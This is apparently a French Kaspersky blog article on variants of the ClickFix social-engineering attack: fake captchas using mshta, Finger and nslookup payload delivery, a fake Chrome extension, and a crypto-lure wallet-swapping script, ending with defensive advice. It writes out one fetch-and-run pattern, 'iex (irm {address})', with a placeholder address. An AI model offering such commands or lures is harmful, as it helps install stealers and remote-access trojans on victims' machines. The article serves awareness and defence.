ingénierie sociale

Variantes de la technique ClickFix

Différents exemples de la technique ClickFix utilisée dans des attaques réelles.

Kaspersky Team
13 Mar 2026

Il y a environ un an, nous avons publié un article sur la technique ClickFix, qui devenait de plus en plus populaire parmi les cybercriminels. Le principe des attaques utilisant la technique ClickFix consiste à convaincre la victime, sous divers prétextes, d’exécuter une commande malveillante sur son ordinateur. Autrement dit, du point de vue des solutions de cybersécurité, la commande est exécuté au nom de l’utilisateur concerné et avec ses privilèges.

Lors des premières utilisations de cette technique, les cybercriminels tentaient de convaincre les victimes qu’elles devaient exécuter une commande pour résoudre un problème ou un captcha, et dans la grande majorité des cas, la commande malveillante était un script PowerShell. Cependant, depuis lors, les pirates informatiques ont trouvé une série de nouvelles ruses, que les utilisateurs devraient connaître, ainsi qu’un certain nombre de nouvelles variantes de diffusion de charges utiles malveillantes, qui méritent également d’être surveillées.

Utilisation de l’utilitaire mshta.exe

L’année dernière, les experts de Microsoft ont publié un rapport sur les cyberattaques visant les propriétaires d’hôtels collaborant avec la plateforme Booking.com. Les cybercriminels ont envoyé de fausses notifications de la part du service, ou des emails prétendant provenir d’invités attirant l’attention sur une évaluation. Dans les deux cas, l’email contenait un lien vers une page imitant le site Booking.com, qui demandait à la victime de prouver qu’elle n’était pas un robot en exécutant un code via le menu Exécuter.

Il existe deux différences essentielles entre cette attaque et la technique ClickFix. La première consiste à ne pas demander à l’utilisateur de copier la chaîne (après tout, une chaîne contenant du code éveille parfois des soupçons). Cette-ci est copiée dans la mémoire tampon d’échange par le site malveillant, généralement lorsque l’utilisateur clique sur une case à cocher qui imite le mécanisme reCAPTCHA. La seconde consiste à ce que la chaîne malveillante appelle l’utilitaire légitime mshta.exe, qui permet d’exécuter des applications écrites en HTML. Elle contacte le serveur des cybercriminels et exécute la charge utile malveillante.

Vidéo sur TikTok et PowerShell avec des privilèges d’administrateur

En octobre 2025, le site BleepingComputer a publié un article au sujet d’une campagne visant à diffuser des programmes malveillants au moyen d’instructions dans des vidéos TikTok. Les vidéos elles-mêmes imitent des tutoriels vidéo indiquant comment activer gratuitement des logiciels propriétaires. Le conseil qu’elles donnent se résume à la nécessité de lancer PowerShell avec des privilèges d’administrateur, puis d’exécuter la commande iex (irm {address}). Ici, la commande irm télécharge un script malveillant à partir d’un serveur contrôlé par les pirates informatiques, et la commande iex (Invoke-Expression) l’exécute. Le script, à son tour, télécharge un programme malveillant voleur d’informations sur l’ordinateur de la victime.

Utilisation du protocole Finger

Une autre variante inhabituelle de l’attaque ClickFix reprend la même technique de captcha, mais le script malveillant utilise le protocole Finger, devenu obsolète. L’utilitaire du même nom permet à n’importe qui de demander des données au sujet d’un utilisateur particulier sur un serveur distant. Le protocole est rarement utilisé de nos jours, mais il continue d’être pris en charge par Windows, macOS et un certain nombre de systèmes basés sur Linux.

L’utilisateur est encouragé à ouvrir l’interface de ligne de commande et à y exécuter une commande qui établit une connexion via le protocole Finger (en utilisant le port TCP 79) avec le serveur des pirates informatiques. Le protocole transfère uniquement des informations textuelles, mais cette opération suffit pour télécharger un autre script sur l’ordinateur de la victime, qui installe alors le programme malveillant.

Variante de la technique CrashFix

Une autre variante de la technique ClickFix se distingue par l’utilisation d’une ingénierie sociale plus élaborée. Cette méthode a été utilisée dans le cadre d’une attaque contre des utilisateurs qui tentaient de trouver un outil permettant de bloquer les bannières publicitaires, les traqueurs, les programmes malveillants et d’autres contenus indésirables sur les pages Internet. Alors qu’elles cherchaient une extension appropriée pour Google Chrome, les victimes ont trouvé un module appelé NexShield – Advanced Web Guardian, qui était en fait un clone d’un véritable logiciel fonctionnel, mais qui, à un certain moment, faisait planter le navigateur et affichait une fausse notification concernant un problème de sécurité détecté et la nécessité d’exécuter une « analyse » pour corriger l’erreur. Si l’utilisateur acceptait, il recevait des instructions sur la marche à suivre pour ouvrir le menu Exécuter et lancer une commande que l’extension avait préalablement copiée dans le presse-papiers.

La commande copiait le fichier connu finger.exe dans un répertoire temporaire, le renommait en « ct.exe », puis le lançait avec l’adresse du pirate. Le reste de l’attaque se déroulait de la même manière que dans le cas susmentionné. En réponse à la demande du protocole Finger, un script malveillant était déployé, qui lançait et installait un cheval de Troie d’accès à distance (dans ce cas, ModeloRAT).

Diffusion de programmes malveillants via une recherche DNS

L’équipe Microsoft Threat Intelligence a également partagé une variante d’attaque ClickFix légèrement plus complexe que d’habitude. Malheureusement, ils n’ont pas décrit la technique d’ingénierie sociale, mais la méthode de diffusion de la charge utile malveillante est plutôt intéressante. Il est probable que, pour compliquer la détection de l’attaque dans un environnement d’entreprise et prolonger la durée de vie de l’infrastructure malveillante, les auteurs de l’attaque ont ajouté une étape supplémentaire : contacter un serveur DNS qu’ils contrôlaient.

Autrement dit, après que la victime a été persuadée de copier et d’exécuter une commande malveillante, une demande est envoyée au serveur DNS au nom de l’utilisateur par l’intermédiaire de l’utilitaire légitime nslookup, afin d’obtenir des données se rapportant au domaine exemple.com. La commande contenait l’adresse d’un serveur DNS contrôlé par les cybercriminels. Elle renvoyait une réponse qui, entre autres, contenait une chaîne de caractères avec un script malveillant, qui à son tour téléchargeait la charge utile finale (dans cette attaque, le programme malveillant ModeloRAT encore une fois).

Appât en cryptomonnaies et JavaScript en tant que charge utile

La variante d’attaque suivante est intéressante en raison de son ingénierie sociale en plusieurs étapes. Dans des commentaires sur Pastebin, des cybercriminels ont activement relayé un message concernant une prétendue faille dans le service d’échange de cryptomonnaies Swapzone.io. Les propriétaires de cryptomonnaies étaient invités à se rendre sur une ressource créée par les escrocs, qui contenait des instructions précises sur la façon d’exploiter cette faille, qui permettait de rapporter jusqu’à 13 000 dollars en quelques jours.

Les instructions décrivent comment les failles du service peuvent être exploitées pour échanger des cryptomonnaies à un taux plus avantageux. Pour ce faire, une victime doit ouvrir le site Internet du service dans le navigateur Chrome, taper manuellement « javascript: » dans la barre d’adresse, puis coller le script JavaScript copié sur le site des pirates et l’exécuter. En réalité, il va de soi que le script ne peut en aucun cas influencer les taux de change. Il se contente de remplacer les adresses des portefeuilles Bitcoin et, si la victime tente bel et bien d’échanger quelque chose, de transférer les fonds sur les comptes des escrocs.

Comment protéger votre entreprise contre les attaques ClickFix ?

Les attaques les plus simples utilisant la technique ClickFix peuvent être contrées en bloquant la combinaison de touches [Win] + [R] sur les appareils de travail. Toutefois, comme le montrent les exemples cités, c’est loin d’être le seul type d’attaque dans lequel les utilisateurs sont invités à exécuter eux-mêmes du code malveillant.

Le principal conseil est donc de sensibiliser les employés à la cybersécurité. Ils doivent clairement comprendre que, si quelqu’un leur demande d’effectuer des manipulations inhabituelles avec le système, et/ou de copier et coller du code quelque part, il s’agit dans la plupart des cas d’une ruse utilisée par les cybercriminels. Il est possible d’organiser une formation de sensibilisation à la sécurité à l’aide de la plateforme Kaspersky Automated Security Awareness Platform.

En outre, pour se protéger contre de telles cyberattaques, nous recommandons :

d’utiliser une protection fiable sur tous les appareils de l’entreprise ;
de surveiller les activités suspectes sur le réseau de l’entreprise à l’aide d’une solution XDR;

si les ressources internes sont insuffisantes, de faire appel à un service externe pour détecter les menaces et y répondre rapidement.

Attribution des programmes malveillants sans cloud

À quoi sert une version locale du moteur d’attribution des menaces de Kaspersky et comment la connecter au plug-in IDA Pro ?

Conseils

Attaques « navigateur dans le navigateur » : de la théorie à la réalité

Une attaque de type « navigateur dans le navigateur », décrite théoriquement en 2022, a été adoptée dans des cas de phishing réels. Nous expliquons comment cette attaque fonctionne et comment repérer une fausse fenêtre d’authentification.

Vulnérabilité ExifTool : comment une image peut infecter les systèmes macOS

Une analyse approfondie de la vulnérabilité CVE-2026-3102, qui représente une menace pour toute personne traitant des images sur un Mac.

Risques, vulnérabilités et confiance zéro : les termes clés sur lesquels le RSSI et le conseil d’administration doivent s’accorder

Présentation des principaux termes liés à la cybersécurité que les collègues ont souvent tendance à interpréter différemment ou de manière incorrecte.

Comment installer ou mettre à jour les applications Kaspersky sur Android en 2026 ?

Nos applications Android ne sont plus disponibles sur Google Play. Nous expliquons comment les télécharger, les installer et les mettre à jour par des moyens alternatifs.

Protection des enfants

Variantes de la technique ClickFix

Utilisation de l’utilitaire mshta.exe

Vidéo sur TikTok et PowerShell avec des privilèges d’administrateur

Utilisation du protocole Finger

Variante de la technique CrashFix

Diffusion de programmes malveillants via une recherche DNS

Appât en cryptomonnaies et JavaScript en tant que charge utile

Comment protéger votre entreprise contre les attaques ClickFix ?

FileFix : une nouvelle variante de ClickFix

Les techniques d’ingénierie sociale

Attribution des programmes malveillants sans cloud

Conseils

Attaques « navigateur dans le navigateur » : de la théorie à la réalité

Vulnérabilité ExifTool : comment une image peut infecter les systèmes macOS

Risques, vulnérabilités et confiance zéro : les termes clés sur lesquels le RSSI et le conseil d’administration doivent s’accorder

Comment installer ou mettre à jour les applications Kaspersky sur Android en 2026 ?

Solutions pour les particuliers

TPE

PME

Grande entreprise

Securelist

Eugene Personal Blog

Encyclopédie de Kaspersky